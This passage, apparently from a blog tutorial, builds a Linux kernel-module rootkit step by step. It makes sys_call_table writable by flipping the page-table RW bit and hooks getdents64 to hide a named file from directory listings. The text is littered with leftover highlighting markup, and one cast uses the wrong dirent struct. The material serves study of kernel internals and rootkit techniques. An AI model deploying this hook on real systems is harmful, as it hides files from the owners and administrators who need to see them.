class="kt"unsigned/spanspan class="w" /spanspan class="kt"int/spanspan class="w" /spanspan class="n"count/spanspan class="p")/spanspan class="w"/span/span span class="code-line"span class="p"{/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="kt"int/spanspan class="w" /spanspan class="n"rtn/spanspan class="p";/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="k"struct/spanspan class="w" /spanspan class="nc"linux_dirent64/spanspan class="w" /spanspan class="o"*/spanspan class="n"cur/spanspan class="w" /spanspan class="o"=/spanspan class="w" /spanspan class="n"dirp/spanspan class="p";/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="kt"int/spanspan class="w" /spanspan class="n"i/spanspan class="w" /spanspan class="o"=/spanspan class="w" /spanspan class="mi"0/spanspan class="p";/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"rtn/spanspan class="w" /spanspan class="o"=/spanspan class="w" /spanspan class="n"original_getdents64/spanspan class="p"(/spanspan class="n"fd/spanspan class="p",/spanspan class="w" /spanspan class="n"dirp/spanspan class="p",/spanspan class="w" /spanspan class="n"count/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="k"while/spanspan class="w" /spanspan class="p"(/spanspan class="n"i/spanspan class="w" /spanspan class="o"lt;/spanspan class="w" /spanspan class="n"rtn/spanspan class="p")/spanspan class="w" /spanspan class="p"{/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="k"if/spanspan class="w" /spanspan class="p"(/spanspan class="n"strncmp/spanspan class="p"(/spanspan class="n"cur/spanspan class="o"-gt;/spanspan class="n"d_name/spanspan class="p",/spanspan class="w" /spanspan class="n"FILE_NAME/spanspan class="p",/spanspan class="w" /spanspan class="n"strlen/spanspan class="p"(/spanspan class="n"FILE_NAME/spanspan class="p"))/spanspan class="w" /spanspan class="o"==/spanspan class="w" /spanspan class="mi"0/spanspan class="p")/spanspan class="w" /spanspan class="p"{/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="kt"int/spanspan class="w" /spanspan class="n"reclen/spanspan class="w" /spanspan class="o"=/spanspan class="w" /spanspan class="n"cur/spanspan class="o"-gt;/spanspan class="n"d_reclen/spanspan class="p";/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="kt"char/spanspan class="w" /spanspan class="o"*/spanspan class="n"next_rec/spanspan class="w" /spanspan class="o"=/spanspan class="w" /spanspan class="p"(/spanspan class="kt"char/spanspan class="w" /spanspan class="o"*/spanspan class="p")/spanspan class="n"cur/spanspan class="w" /spanspan class="o"+/spanspan class="w" /spanspan class="n"reclen/spanspan class="p";/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="kt"int/spanspan class="w" /spanspan class="n"len/spanspan class="w" /spanspan class="o"=/spanspan class="w" /spanspan class="p"(/spanspan class="kt"int/spanspan class="p")/spanspan class="n"dirp/spanspan class="w" /spanspan class="o"+/spanspan class="w" /spanspan class="n"rtn/spanspan class="w" /spanspan class="o"-/spanspan class="w" /spanspan class="p"(/spanspan class="kt"int/spanspan class="p")/spanspan class="n"next_rec/spanspan class="p";/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"memmove/spanspan class="p"(/spanspan class="n"cur/spanspan class="p",/spanspan class="w" /spanspan class="n"next_rec/spanspan class="p",/spanspan class="w" /spanspan class="n"len/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"rtn/spanspan class="w" /spanspan class="o"-=/spanspan class="w" /spanspan class="n"reclen/spanspan class="p";/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="k"continue/spanspan class="p";/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="p"}/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"i/spanspan class="w" /spanspan class="o"+=/spanspan class="w" /spanspan class="n"cur/spanspan class="o"-gt;/spanspan class="n"d_reclen/spanspan class="p";/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"cur/spanspan class="w" /spanspan class="o"=/spanspan class="w" /spanspan class="p"(/spanspan class="k"struct/spanspan class="w" /spanspan class="nc"linux_dirent/spanspan class="o"*/spanspan class="p")/spanspan class="w" /spanspan class="p"((/spanspan class="kt"char/spanspan class="o"*/spanspan class="p")/spanspan class="n"dirp/spanspan class="w" /spanspan class="o"+/spanspan class="w" /spanspan class="n"i/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="p"}/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="k"return/spanspan class="w" /spanspan class="n"rtn/spanspan class="p";/spanspan class="w"/span/span span class="code-line"span class="p"}/spanspan class="w"/span/span span class="code-line"/code/pre/div /td/tr/table pHere we just run the actual system call, loop through the struct that is returned, searching each filename (codelinux_dirent64-gt;d_name/code) with the static constant codeFILE_NAME/code, and if it matches recalculating what is being returned./p h2The sys_call_table/h2 pThe sys_call_table is the table kept by the kernel containing all of the system calls and pointers to where they are in memory./p pWe need to do 2 things regarding this, firstly find the address of the sys_call_table and secondly figure out how to make this table writable (because by default this table is read only)./p pThe first part is pretty easy providing you don't want a portable version. The current kernels codeSystem.map/code file will tell us this:/p table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal"1/span/span span class="code-line"span class="normal"2/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="gp"root@dev:~/lkms# /spangrep sys_call_table /boot/System.map-span class="sb"`/spanuname -rspan class="sb"`/span/span span class="code-line"span class="go"c1454100 R sys_call_table/span/span span class="code-line"/code/pre/div /td/tr/table pEasy enough, now to figure out how to make this writable./p pTo do this we need to change the a href="https://en.wikipedia.org/wiki/Page_table" target="_blank"page table/a entry relating to the address where codesys_call_table/code is stored./p pWe can get this entry using the codelookup_address/code function defined in codearch/x86/mm/pageattr.c/code:/p table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal"1/span/span span class="code-line"span class="normal"2/span/span span class="code-line"span class="normal"3/span/span span class="code-line"span class="normal"4/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="n"pte_t/spanspan class="w" /spanspan class="o"*/spanspan class="nf"lookup_address/spanspan class="p"(/spanspan class="kt"unsigned/spanspan class="w" /spanspan class="kt"long/spanspan class="w" /spanspan class="n"address/spanspan class="p",/spanspan class="w" /spanspan class="kt"unsigned/spanspan class="w" /spanspan class="kt"int/spanspan class="w" /spanspan class="o"*/spanspan class="n"level/spanspan class="p")/spanspan class="w"/span/span span class="code-line"span class="p"{/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="k"return/spanspan class="w" /spanspan class="n"__lookup_address_in_pgd/spanspan class="p"(/spanspan class="n"pgd_offset_k/spanspan class="p"(/spanspan class="n"address/spanspan class="p"),/spanspan class="w" /spanspan class="n"address/spanspan class="p",/spanspan class="w" /spanspan class="n"level/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="p"}/spanspan class="w"/span/span span class="code-line"/code/pre/div /td/tr/table pAs you can see it returns a pointer to some type of codepte_t/code structure. After a grep through the source again the definition of this structure is in codearch/x86/include/asm/pgtable_64_types.h/code:/p table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal"1/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="k"typedef/spanspan class="w" /spanspan class="k"struct/spanspan class="w" /spanspan class="p"{/spanspan class="w" /spanspan class="n"pteval_t/spanspan class="w" /spanspan class="n"pte/spanspan class="p";/spanspan class="w" /spanspan class="p"}/spanspan class="w" /spanspan class="n"pte_t/spanspan class="p";/spanspan class="w"/span/span span class="code-line"/code/pre/div /td/tr/table pThis just contains 1 member (codepteval_t pte/code), luckily the definition of codepteval_t/code is in the same file:/p table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal"1/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="k"typedef/spanspan class="w" /spanspan class="kt"unsigned/spanspan class="w" /spanspan class="kt"long/spanspan class="w" /spanspan class="n"pteval_t/spanspan class="p";/spanspan class="w"/span/span span class="code-line"/code/pre/div /td/tr/table pSo basically this is a structure of 1 member of type codeunsigned long/code. The question now becomes how do we manipulate this to make the section of memory writable./p pAfter more grepping through the kernel source it appears the answer to our questions is in codearch/x86/include/asm/pgtable_types.h/code, here is an excerpt:/p table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal" 1/span/span span class="code-line"span class="normal" 2/span/span span class="code-line"span class="normal" 3/span/span span class="code-line"span class="normal" 4/span/span span class="code-line"span class="normal" 5/span/span span class="code-line"span class="normal" 6/span/span span class="code-line"span class="normal" 7/span/span span class="code-line"span class="normal" 8/span/span span class="code-line"span class="normal" 9/span/span span class="code-line"span class="normal"10/span/span span class="code-line"span class="normal"11/span/span span class="code-line"span class="normal"12/span/span span class="code-line"span class="normal"13/span/span span class="code-line"span class="normal"14/span/span span class="code-line"span class="normal"15/span/span span class="code-line"span class="normal"16/span/span span class="code-line"span class="normal"17/span/span span class="code-line"span class="normal"18/span/span span class="code-line"span class="normal"19/span/span span class="code-line"span class="normal"20/span/span span class="code-line"span class="normal"21/span/span span class="code-line"span class="normal"22/span/span span class="code-line"span class="normal"23/span/span span class="code-line"span class="normal"24/span/span span class="code-line"span class="normal"25/span/span span class="code-line"span class="normal"26/span/span span class="code-line"span class="normal"27/span/span span class="code-line"span class="normal"28/span/span span class="code-line"span class="normal"29/span/span span class="code-line"span class="normal"30/span/span span class="code-line"span class="normal"31/span/span span class="code-line"span class="normal"32/span/span span class="code-line"span class="normal"33/span/span span class="code-line"span class="normal"34/span/span span class="code-line"span class="normal"35/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="cp"#define _PAGE_BIT_PRESENT 0 /spanspan class="cm"/* is present *//spanspan class="cp"/span/span span class="code-line"span class="cp"#define _PAGE_BIT_RW 1 /spanspan class="cm"/* writeable *//spanspan class="cp"/span/span span class="code-line"span class="cp"#define _PAGE_BIT_USER 2 /spanspan class="cm"/* userspace addressable *//spanspan class="cp"/span/span span class="code-line"span class="cp"#define _PAGE_BIT_PWT 3 /spanspan class="cm"/* page write through *//spanspan class="cp"/span/span span class="code-line"span class="cp"#define _PAGE_BIT_PCD 4 /spanspan class="cm"/* page cache disabled *//spanspan class="cp"/span/span span class="code-line"span class="cp"#define _PAGE_BIT_ACCESSED 5 /spanspan class="cm"/* was accessed (raised by CPU) *//spanspan class="cp"/span/span span class="code-line"span class="cp"#define _PAGE_BIT_DIRTY 6 /spanspan class="cm"/* was written to (raised by CPU) *//spanspan class="cp"/span/span span class="code-line"span class="cp"#define _PAGE_BIT_PSE 7 /spanspan class="cm"/* 4 MB (or 2MB) page *//spanspan class="cp"/span/span span class="code-line"span class="cp"#define _PAGE_BIT_PAT 7 /spanspan class="cm"/* on 4KB pages *//spanspan class="cp"/span/span span class="code-line"span class="cp"#define _PAGE_BIT_GLOBAL 8 /spanspan class="cm"/* Global TLB entry PPro+ *//spanspan class="cp"/span/span span class="code-line"span class="cp"#define _PAGE_BIT_UNUSED1 9 /spanspan class="cm"/* available for programmer *//spanspan class="cp"/span/span span class="code-line"span class="cp"#define _PAGE_BIT_IOMAP 10 /spanspan class="cm"/* flag used to indicate IO mapping *//spanspan class="cp"/span/span span class="code-line"span class="cp"#define _PAGE_BIT_HIDDEN 11 /spanspan class="cm"/* hidden by kmemcheck *//spanspan class="cp"/span/span span class="code-line"span class="cp"#define _PAGE_BIT_PAT_LARGE 12 /spanspan class="cm"/* On 2MB or 1GB pages *//spanspan class="cp"/span/span span class="code-line"span class="cp"#define _PAGE_BIT_SPECIAL _PAGE_BIT_UNUSED1/span/span span class="code-line"span class="cp"#define _PAGE_BIT_CPA_TEST _PAGE_BIT_UNUSED1/span/span span class="code-line"span class="cp"#define _PAGE_BIT_SPLITTING _PAGE_BIT_UNUSED1 /spanspan class="cm"/* only valid on a PSE pmd *//spanspan class="cp"/span/span span class="code-line"span class="cp"#define _PAGE_BIT_NX 63 /spanspan class="cm"/* No execute: only valid after cpuid check *//spanspan class="cp"/span/span span class="code-line"span class="p".../spanspan class="w"/span/span span class="code-line"span class="cp"#define _PAGE_PRESENT (_AT(pteval_t, 1) lt;lt; _PAGE_BIT_PRESENT)/span/span span class="code-line"span class="cp"#define _PAGE_RW (_AT(pteval_t, 1) lt;lt; _PAGE_BIT_RW)/span/span span class="code-line"span class="cp"#define _PAGE_USER (_AT(pteval_t, 1) lt;lt; _PAGE_BIT_USER)/span/span span class="code-line"span class="cp"#define _PAGE_PWT (_AT(pteval_t, 1) lt;lt; _PAGE_BIT_PWT)/span/span span class="code-line"span class="cp"#define _PAGE_PCD (_AT(pteval_t, 1) lt;lt; _PAGE_BIT_PCD)/span/span span class="code-line"span class="cp"#define _PAGE_ACCESSED (_AT(pteval_t, 1) lt;lt; _PAGE_BIT_ACCESSED)/span/span span class="code-line"span class="cp"#define _PAGE_DIRTY (_AT(pteval_t, 1) lt;lt; _PAGE_BIT_DIRTY)/span/span span class="code-line"span class="cp"#define _PAGE_PSE (_AT(pteval_t, 1) lt;lt; _PAGE_BIT_PSE)/span/span span class="code-line"span class="cp"#define _PAGE_GLOBAL (_AT(pteval_t, 1) lt;lt; _PAGE_BIT_GLOBAL)/span/span span class="code-line"span class="cp"#define _PAGE_UNUSED1 (_AT(pteval_t, 1) lt;lt; _PAGE_BIT_UNUSED1)/span/span span class="code-line"span class="cp"#define _PAGE_IOMAP (_AT(pteval_t, 1) lt;lt; _PAGE_BIT_IOMAP)/span/span span class="code-line"span class="cp"#define _PAGE_PAT (_AT(pteval_t, 1) lt;lt; _PAGE_BIT_PAT)/span/span span class="code-line"span class="cp"#define _PAGE_PAT_LARGE (_AT(pteval_t, 1) lt;lt; _PAGE_BIT_PAT_LARGE)/span/span span class="code-line"span class="cp"#define _PAGE_SPECIAL (_AT(pteval_t, 1) lt;lt; _PAGE_BIT_SPECIAL)/span/span span class="code-line"span class="cp"#define _PAGE_CPA_TEST (_AT(pteval_t, 1) lt;lt; _PAGE_BIT_CPA_TEST)/span/span span class="code-line"span class="cp"#define _PAGE_SPLITTING (_AT(pteval_t, 1) lt;lt; _PAGE_BIT_SPLITTING)/span/span span class="code-line"/code/pre/div /td/tr/table pAs you can see, the writable bit is 1 and can be referenced with code_PAGE_RW/code./p pUsing this information its easy to write our functions to make memory writable and readonly again:/p table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal" 1/span/span span class="code-line"span class="normal" 2/span/span span class="code-line"span class="normal" 3/span/span span class="code-line"span class="normal" 4/span/span span class="code-line"span class="normal" 5/span/span span class="code-line"span class="normal" 6/span/span span class="code-line"span class="normal" 7/span/span span class="code-line"span class="normal" 8/span/span span class="code-line"span class="normal" 9/span/span span class="code-line"span class="normal"10/span/span span class="code-line"span class="normal"11/span/span span class="code-line"span class="normal"12/span/span span class="code-line"span class="normal"13/span/span span class="code-line"span class="normal"14/span/span span class="code-line"span class="normal"15/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="kt"int/spanspan class="w" /spanspan class="nf"set_page_rw/spanspan class="p"(/spanspan class="kt"unsigned/spanspan class="w" /spanspan class="kt"long/spanspan class="w" /spanspan class="n"addr/spanspan class="p")/spanspan class="w"/span/span span class="code-line"span class="p"{/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="kt"unsigned/spanspan class="w" /spanspan class="kt"int/spanspan class="w" /spanspan class="n"level/spanspan class="p";/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"pte_t/spanspan class="w" /spanspan class="o"*/spanspan class="n"pte/spanspan class="w" /spanspan class="o"=/spanspan class="w" /spanspan class="n"lookup_address/spanspan class="p"(/spanspan class="n"addr/spanspan class="p",/spanspan class="w" /spanspan class="o"amp;/spanspan class="n"level/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="k"if/spanspan class="w" /spanspan class="p"(/spanspan class="n"pte/spanspan class="o"-gt;/spanspan class="n"pte/spanspan class="w" /spanspan class="o"amp;~/spanspan class="w" /spanspan class="n"_PAGE_RW/spanspan class="p")/spanspan class="w" /spanspan class="n"pte/spanspan class="o"-gt;/spanspan class="n"pte/spanspan class="w" /spanspan class="o"|=/spanspan class="w" /spanspan class="n"_PAGE_RW/spanspan class="p";/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="k"return/spanspan class="w" /spanspan class="mi"0/spanspan class="p";/spanspan class="w"/span/span span class="code-line"span class="p"}/spanspan class="w"/span/span span class="code-line"/span span class="code-line"span class="kt"int/spanspan class="w" /spanspan class="nf"set_page_ro/spanspan class="p"(/spanspan class="kt"unsigned/spanspan class="w" /spanspan class="kt"long/spanspan class="w" /spanspan class="n"addr/spanspan class="p")/spanspan class="w"/span/span span class="code-line"span class="p"{/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="kt"unsigned/spanspan class="w" /spanspan class="kt"int/spanspan class="w" /spanspan class="n"level/spanspan class="p";/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"pte_t/spanspan class="w" /spanspan class="o"*/spanspan class="n"pte/spanspan class="w" /spanspan class="o"=/spanspan class="w" /spanspan class="n"lookup_address/spanspan class="p"(/spanspan class="n"addr/spanspan class="p",/spanspan class="w" /spanspan class="o"amp;/spanspan class="n"level/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"pte/spanspan class="o"-gt;/spanspan class="n"pte/spanspan class="w" /spanspan class="o"=/spanspan class="w" /spanspan class="n"pte/spanspan class="o"-gt;/spanspan class="n"pte/spanspan class="w" /spanspan class="o"amp;~/spanspan class="n"_PAGE_RW/spanspan class="p";/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="k"return/spanspan class="w" /spanspan class="mi"0/spanspan class="p";/spanspan class="w"/span/span span class="code-line"span class="p"}/spanspan class="w"/span/span span class="code-line"/code/pre/div /td/tr/table h2Putting It All Together/h2 pNow we have enough information to build our LKM:/p table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal" 1/span/span span class="code-line"span class="normal" 2/span/span span class="code-line"span class="normal" 3/span/span span class="code-line"span class="normal" 4/span/span span class="code-line"span class="normal" 5/span/span span class="code-line"span class="normal" 6/span/span span class="code-line"span class="normal" 7/span/span span class="code-line"span class="normal" 8/span/span span class="code-line"span class="normal" 9/span/span span class="code-line"span class="normal"10/span/span span class="code-line"span class="normal"11/span/span span class="code-line"span class="normal"12/span/span span class="code-line"span class="normal"13/span/span span class="code-line"span class="normal"14/span/span span class="code-line"span class="normal"15/span/span span class="code-line"span class="normal"16/span/span span class="code-line"span class="normal"17/span/span span class="code-line"span class="normal"18/span/span span class="code-line"span class="normal"19/span/span span class="code-line"span class="normal"20/span/span span class="code-line"span class="normal"21/span/span span class="code-line"span class="normal"22/span/span span class="code-line"span class="normal"23/span/span span class="code-line"span class="normal"24/span/span span class="code-line"span class="normal"25/span/span span class="code-line"span class="normal"26/span/span span class="code-line"span class="normal"27/span/span span class="code-line"span class="normal"28/span/span span class="code-line"span class="normal"29/span/span span class="code-line"span class="normal"30/span/span span class="code-line"span class="normal"31/span/span span class="code-line"span class="normal"32/span/span span class="code-line"span class="normal"33/span/span span class="code-line"span class="normal"34/span/span span class="code-line"span class="normal"35/span/span span class="code-line"span class="normal"36/span/span span class="code-line"span class="normal"37/span/span span class="code-line"span class="normal"38/span/span span class="code-line"span class="normal"39/span/span span class="code-line"span class="normal"40/span/span span class="code-line"span class="normal"41/span/span span class="code-line"span class="normal"42/span/span span class="code-line"span class="normal"43/span/span span class="code-line"span class="normal"44/span/span span class="code-line"span class="normal"45/span/span span class="code-line"span class="normal"46/span/span span class="code-line"span class="normal"47/span/span span class="code-line"span class="normal"48/span/span span class="code-line"span class="normal"49/span/span span class="code-line"span class="normal"50/span/span span class="code-line"span class="normal"51/span/span span class="code-line"span class="normal"52/span/span span class="code-line"span class="normal"53/span/span span class="code-line"span class="normal"54/span/span span class="code-line"span class="normal"55/span/span span class="code-line"span class="normal"56/span/span span class="code-line"span class="normal"57/span/span span class="code-line"span class="normal"58/span/span span class="code-line"span class="normal"59/span/span span class="code-line"span class="normal"60/span/span span class="code-line"span class="normal"61/span/span span class="code-line"span class="normal"62/span/span span class="code-line"span class="normal"63/span/span span class="code-line"span class="normal"64/span/span span class="code-line"span class="normal"65/span/span span class="code-line"span class="normal"66/span/span span class="code-line"span class="normal"67/span/span span class="code-line"span class="normal"68/span/span span class="code-line"span class="normal"69/span/span span class="code-line"span class="normal"70/span/span span class="code-line"span class="normal"71/span/span span class="code-line"span class="normal"72/span/span span class="code-line"span class="normal"73/span/span span class="code-line"span class="normal"74/span/span span class="code-line"span class="normal"75/span/span span class="code-line"span class="normal"76/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="cp"#include/spanspan class="w" /spanspan class="cpf"lt;linux/module.hgt;/spanspan class="cp"/span/span span class="code-line"span class="cp"#include/spanspan class="w" /spanspan class="cpf"lt;linux/init.hgt;/spanspan class="cp"/span/span span class="code-line"span class="cp"#include/spanspan class="w" /spanspan class="cpf"lt;linux/kernel.hgt;/spanspan class="cp"/span/span span class="code-line"span class="cp"#include/spanspan class="w" /spanspan class="cpf"lt;linux/moduleparam.hgt;/spanspan class="cp"/span/span span class="code-line"span class="cp"#include/spanspan class="w" /spanspan class="cpf"lt;linux/unistd.hgt;/spanspan class="cp"/span/span span class="code-line"span class="cp"#include/spanspan class="w" /spanspan class="cpf"lt;linux/semaphore.hgt;/spanspan class="cp"/span/span span class="code-line"span class="cp"#include/spanspan class="w" /spanspan class="cpf"lt;linux/dirent.hgt;/spanspan class="cp"/span/span span class="code-line"span class="cp"#include/spanspan class="w" /spanspan class="cpf"lt;asm/cacheflush.hgt;/spanspan class="cp"/span/span span class="code-line"/span span class="code-line"span class="n"MODULE_AUTHOR/spanspan class="p"(/spanspan class="s"quot;0xe7, 0x1equot;/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="n"MODULE_DESCRIPTION/spanspan class="p"(/spanspan class="s"quot;Hide a file from getdents syscallsquot;/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="n"MODULE_LICENSE/spanspan class="p"(/spanspan class="s"quot;GPLquot;/spanspan class="p");/spanspan class="w"/span/span span class="code-line"/span span class="code-line"span class="kt"void/spanspan class="w" /spanspan class="o"**/spanspan class="n"sys_call_table/spanspan class="p";/spanspan class="w"/span/span span class="code-line"/span span class="code-line"span class="cp"#define FILE_NAME quot;thisisatestfile.txtquot;/span/span span class="code-line"/span span class="code-line"span class="n"asmlinkage/spanspan class="w" /spanspan class="nf"int/spanspan class="w" /spanspan class="p"(/spanspan class="o"*/spanspan class="n"original_getdents64/spanspan class="p")/spanspan class="w" /spanspan class="p"(/spanspan class="kt"unsigned/spanspan class="w" /spanspan class="kt"int/spanspan class="w" /spanspan class="n"fd/spanspan class="p",/spanspan class="w" /spanspan class="k"struct/spanspan class="w" /spanspan class="nc"linux_dirent64/spanspan class="w" /spanspan class="o"*/spanspan class="n"dirp/spanspan class="p",/spanspan class="w" /spanspan class="kt"unsigned/spanspan class="w" /spanspan class="kt"int/spanspan class="w" /spanspan class="n"count/spanspan class="p");/spanspan class="w"/span/span span class="code-line"/span span class="code-line"span class="n"asmlinkage/spanspan class="w" /spanspan class="kt"int/spanspan class="w" /spanspan class="n"sys_getdents64_hook/spanspan class="p"(/spanspan class="kt"unsigned/spanspan class="w" /spanspan class="kt"int/spanspan class="w" /spanspan class="n"fd/spanspan class="p",/spanspan class="w" /spanspan class="k"struct/spanspan class="w" /spanspan class="nc"linux_dirent64/spanspan class="w" /spanspan class="o"*/spanspan class="n"dirp/spanspan class="p",/spanspan class="w" /spanspan class="kt"unsigned/spanspan class="w" /spanspan class="kt"int/spanspan class="w" /spanspan class="n"count/spanspan class="p")/spanspan class="w"/span/span span class="code-line"span class="p"{/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="kt"int/spanspan class="w" /spanspan class="n"rtn/spanspan class="p";/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="k"struct/spanspan class="w" /spanspan class="nc"linux_dirent64/spanspan class="w" /spanspan class="o"*/spanspan class="n"cur/spanspan class="w" /spanspan class="o"=/spanspan class="w" /spanspan class="n"dirp/spanspan class="p";/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="kt"int/spanspan class="w" /spanspan class="n"i/spanspan class="w" /spanspan class="o"=/spanspan class="w" /spanspan class="mi"0/spanspan class="p";/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"rtn/spanspan class="w" /spanspan class="o"=/spanspan class="w" /spanspan class="n"original_getdents64/spanspan class="p"(/spanspan class="n"fd/spanspan class="p",/spanspan class="w" /spanspan class="n"dirp/spanspan class="p",/spanspan class="w" /spanspan class="n"count/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="k"while/spanspan class="w" /spanspan class="p"(/spanspan class="n"i/spanspan class="w" /spanspan class="o"lt;/spanspan class="w" /spanspan class="n"rtn/spanspan class="p")/spanspan class="w" /spanspan class="p"{/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="k"if/spanspan class="w" /spanspan class="p"(/spanspan class="n"strncmp/spanspan class="p"(/spanspan class="n"cur/spanspan class="o"-gt;/spanspan class="n"d_name/spanspan class="p",/spanspan class="w" /spanspan class="n"FILE_NAME/spanspan class="p",/spanspan class="w" /spanspan class="n"strlen/spanspan class="p"(/spanspan class="n"FILE_NAME/spanspan class="p"))/spanspan class="w" /spanspan class="o"==/spanspan class="w" /spanspan class="mi"0/spanspan class="p")/spanspan class="w" /spanspan class="p"{/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="kt"int/spanspan class="w" /spanspan class="n"reclen/spanspan class="w" /spanspan class="o"=/spanspan class="w" /spanspan class="n"cur/spanspan class="o"-gt;/spanspan class="n"d_reclen/spanspan class="p";/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="kt"char/spanspan class="w" /spanspan class="o"*/spanspan class="n"next_rec/spanspan class="w" /spanspan class="o"=/spanspan class="w" /spanspan class="p"(/spanspan class="kt"char/spanspan class="w" /spanspan class="o"*/spanspan class="p")/spanspan class="n"cur/spanspan class="w" /spanspan class="o"+/spanspan class="w" /spanspan class="n"reclen/spanspan class="p";/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="kt"int/spanspan class="w" /spanspan class="n"len/spanspan class="w" /spanspan class="o"=/spanspan class="w" /spanspan class="p"(/spanspan class="kt"int/spanspan class="p")/spanspan class="n"dirp/spanspan class="w" /spanspan class="o"+/spanspan class="w" /spanspan class="n"rtn/spanspan class="w" /spanspan class="o"-/spanspan class="w" /spanspan class="p"(/spanspan class="kt"int/spanspan class="p")/spanspan class="n"next_rec/spanspan class="p";/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"memmove/spanspan class="p"(/spanspan class="n"cur/spanspan class="p",/spanspan class="w" /spanspan class="n"next_rec/spanspan class="p",/spanspan class="w" /spanspan class="n"len/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"rtn/spanspan class="w" /spanspan class="o"-=/spanspan class="w" /spanspan class="n"reclen/spanspan class="p";/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="k"continue/spanspan class="p";/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="p"}/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"i/spanspan class="w" /spanspan class="o"+=/spanspan class="w" /spanspan class="n"cur/spanspan class="o"-gt;/spanspan class="n"d_reclen/spanspan class="p";/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"cur/spanspan class="w" /spanspan class="o"=/spanspan class="w" /spanspan class="p"(/spanspan class="k"struct/spanspan class="w" /spanspan class="nc"linux_dirent/spanspan class="o"*/spanspan class="p")/spanspan class="w" /spanspan class="p"((/spanspan class="kt"char/spanspan class="o"*/spanspan class="p")/spanspan class="n"dirp/spanspan class="w" /spanspan class="o"+/spanspan class="w" /spanspan class="n"i/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="p"}/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="k"return/spanspan class="w" /spanspan class="n"rtn/spanspan class="p";/spanspan class="w"/span/span span class="code-line"span class="p"}/spanspan class="w"/span/span span class="code-line"/span span class="code-line"span class="kt"int/spanspan class="w" /spanspan class="n"set_page_rw/spanspan class="p"(/spanspan class="kt"unsigned/spanspan class="w" /spanspan class="kt"long/spanspan class="w" /spanspan class="n"addr/spanspan class="p")/spanspan class="w"/span/span span class="code-line"span class="p"{/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="kt"unsigned/spanspan class="w" /spanspan class="kt"int/spanspan class="w" /spanspan class="n"level/spanspan class="p";/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"pte_t/spanspan class="w" /spanspan class="o"*/spanspan class="n"pte/spanspan class="w" /spanspan class="o"=/spanspan class="w" /spanspan class="n"lookup_address/spanspan class="p"(/spanspan class="n"addr/spanspan class="p",/spanspan class="w" /spanspan class="o"amp;/spanspan class="n"level/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="k"if/spanspan class="w" /spanspan class="p"(/spanspan class="n"pte/spanspan class="o"-gt;/spanspan class="n"pte/spanspan class="w" /spanspan class="o"amp;~/spanspan class="w" /spanspan class="n"_PAGE_RW/spanspan class="p")/spanspan class="w" /spanspan class="n"pte/spanspan class="o"-gt;/spanspan class="n"pte/spanspan class="w" /spanspan class="o"|=/spanspan class="w" /spanspan 